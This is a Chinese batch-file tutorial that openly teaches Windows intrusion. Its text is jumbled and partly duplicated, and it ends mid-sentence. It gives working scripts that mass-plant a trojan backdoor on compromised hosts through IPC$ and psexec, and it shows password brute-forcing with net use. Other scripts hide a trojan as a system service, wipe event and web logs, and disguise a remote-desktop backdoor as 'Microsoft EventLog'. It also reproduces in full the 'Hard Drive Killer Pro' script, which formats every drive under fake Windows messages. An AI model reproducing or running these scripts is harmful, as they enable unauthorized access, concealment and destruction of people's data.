":命令成功完成">>D:ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \%1ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \%1 c:winntsystem32windrv32.exe @psexec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 二、如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \1%ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^. 三、如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:>dir z: & dir c:Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:Ex4rch 2002-05-14 23:51 2002-05-14 23:51 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:>dir z: && dir c:Ex4rch The system cannot find the path specified. C:>dir c:Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:Ex4rch 2002-05-14 23:55 2002-05-14 23:55 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 四、管道命令的使用 1.| 命令 Usage:第一条命令 | 第二条命令 [| 第三条命令...] 将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。 sample: time /t>>D:IP.log netstat -n -p tcp|find ":3389">>D:IP.log start Explorer 看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。 2.>、>>输出重定向命令 将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。 sample1: echo hello world>c:hello.txt (stupid example?) sample2: 时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录: 运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 3.& 、<& & 将一个句柄的输出写入到另一个句柄的输入中。 >Sample.reg @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg @echo "Invader"="Ex4rch">>Sample.reg @echo "door"=5>>C:\WINNT\system32\door.exe>>Sample.reg @echo "Autodos"=dword:02>>Sample.reg samlpe2: 我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll @echo "windsnx "=- >>patch.dll @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键服务的同时将其属设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^. 六、精彩实例放送 1.删除win2k/xp系统默认共享的批处理 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo preparing to delete all the default shares.when ready pres any key. @pause @echo off :Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo. echo ------------------------------------------------------ echo. echo Now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo. echo All the shares have been deleteed echo. echo ------------------------------------------------------ echo. echo Now modify the registry to change the system default properties. echo. echo Now creating the registry file echo Windows Registry Editor Version 5.00> c:delshare.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg echo "AutoShareWks"=dword:00000000>> c:delshare.reg echo "AutoShareServer"=dword:00000000>> c:delshare.reg echo Nowing using the registry file to chang the system default properties. regedit /s c:delshare.reg echo Deleting the temprotarily files. del c:delshare.reg goto :END :Usage echo. echo ------------------------------------------------------ echo. echo ☆ A example for batch file ☆ echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo. echo Author:Ex4rch echo Mail:Ex4rch@hotmail.com QQ:1672602 echo. echo Error:Not enough parameters echo. echo ☆ Please enter the share disk you wanna delete ☆ echo. echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo. echo If the disklable is not as C: D: E: ,Please chang it youself. echo. echo example: echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : echo delshare c d e x y z ipc admin print echo. echo *** you can delete nine shares once in a useing *** echo. echo ------------------------------------------------------ goto :EOF :END echo. echo ------------------------------------------------------ echo. echo OK,delshare.bat has deleted all the share you assigned. echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. echo echo. echo ------------------------------------------------------ echo. :EOF echo end of the batch file ------------------------ cut here then save as .bat or .cmd file --------------------------- .全面加固系统(给肉鸡打补丁)的批处理文件 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo Windows Registry Editor Version 5.00 >patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll @echo "AutoShareServer"=dword:00000000 >>patch.dll @echo "AutoShareWks"=dword:00000000 >>patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll @echo "restrictanonymous"=dword:00000001 >>patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll @echo "ShutdownWithoutLogon"="0" >>patch.dll @REM [禁止登录前关机] @echo "DontDisplayLastUserName"="1" >>patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll ------------------------ cut here then save as .bat or .cmd file --------------------------- 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 @regedit /s patch.dll @net stop w3svc @net stop event log @del c:winntsystem32logfilesw3svc1*.* /f /q @del c:winntsystem32logfilesw3svc2*.* /f /q @del c:winntsystem32config*.event /f /q @del c:winntsystem32dtclog*.* /f /q @del c:winnt*.txt /f /q @del c:winnt*.log /f /q @net start w3svc @net start event log @rem [删除日志] @net stop lanmanserver /y @net stop Schedule /y @net stop RemoteRegistry /y @del patch.dll @echo The server has been patched,Have fun. @del patch.bat @REM [禁止一些危险的服务。] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll @echo "PortNumber"=dword:00002010 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll @echo "PortNumber"=dword:00002012 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo "ErrorControl"=dword:00000001 >>patch.dll @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll @echo "ObjectName"="LocalSystem" >>patch.dll @echo "Type"=dword:00000010 >>patch.dll @echo "Description"="Keep record of the program and windows' message。" >>patch.dll @echo "DisplayName"="Microsoft EventLog" >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] 3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo off rem This program is dedecated to a very special person that does not want to be named. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo call format c: /q /u /autoSample >nul >>c:autoexec.bat call attrib +r +h c:autoexec.bat >nul rem Drive checking and assigning the valid drives to the drive variable. set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, don't worry about how it rem works, it's d*amn to complicated for the average or even the expert batch programmer. rem Except for Tom Lavedas. echo @echo off >drivechk.bat echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem When errorlevel is 1, then the above is not true, if 0, then it's true. rem Opposite of binary rules. If 0, it will elaps to the next command. echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. rem if errorlevel is 0, then it will elaps to the next command. echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if it's errorlevel 1, then the specified drive is a hard or floppy drive. rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive. echo :enddc >>drivechk.bat rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". rem Now we will use the program drivechk.bat to attain valid drive information. :Sampledrv for %%a in (%alldrive%) do call drivechk.bat %%a >nul del drivechk.bat >nul if %drive.==. set drive=c :form_del call attrib -r -h c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers >>c:autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat echo cd >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:autoexec.bat echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:autoexec.bat echo echo 1. To make people aware that security should not be taken for granted. >>c:autoexec.bat echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:autoexec.bat echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:autoexec.bat echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:autoexec.bat echo echo. >>c:autoexec.bat echo echo Regards, >>c:autoexec.bat echo echo. >>c:autoexec.bat echo echo Munga Bunga >>c:autoexec.bat call attrib +r +h c:autoexec.bat :makedir if exist c:temp.bat attrib -r -h c:temp.bat >nul echo @echo off >c:temp.bat echo %%1: >>c:temp.bat echo cd >>c:temp.bat echo :startmd >>c:temp.bat echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a >>c:temp.bat echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:temp.bat echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd >>c:temp.bat call attrib +r +h c:temp.bat >nul cls echo Initializing Variables . . . rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction. for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul cls echo Initializing Variables . . . echo Validating Data . . . for %%a in (%drive%) do call c:temp.bat %%a Munga >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . for %%a in (%drive%) call attrib -r -h %%a: /S >nul call attrib +r +h c:temp.bat >nul call attrib +r +h c:autoexec.bat >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . echo Initializing Application . . . for %%a in (%drive%) call deltree /y %%a:*. >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . echo Initializing Application . . . echo Starting Application . . . for %%a in (%drive%) do call c:temp.bat %%a Munga >nul cls echo Thank you for using a Munga Bunga product. echo. echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. echo. echo Here is a joke for you . . . echo. echo Q). What's the worst thing about being an egg? echo A). You only get laid once. echo. echo HAHAHAHA, get it? Don't you just love that one? echo. echo Regards, echo. echo Munga Bunga :end rem Hard Drive Killer Pro Version 4.0, enjoy!!!! rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get out of here) 全文完毕, 简明批处理教程(上)2009-05-30 15:53 前言 最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片<>给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们. 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label (label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串"  待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名  待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字  待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2   DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [[drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN (command) DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN (command) DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 z 或 Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in 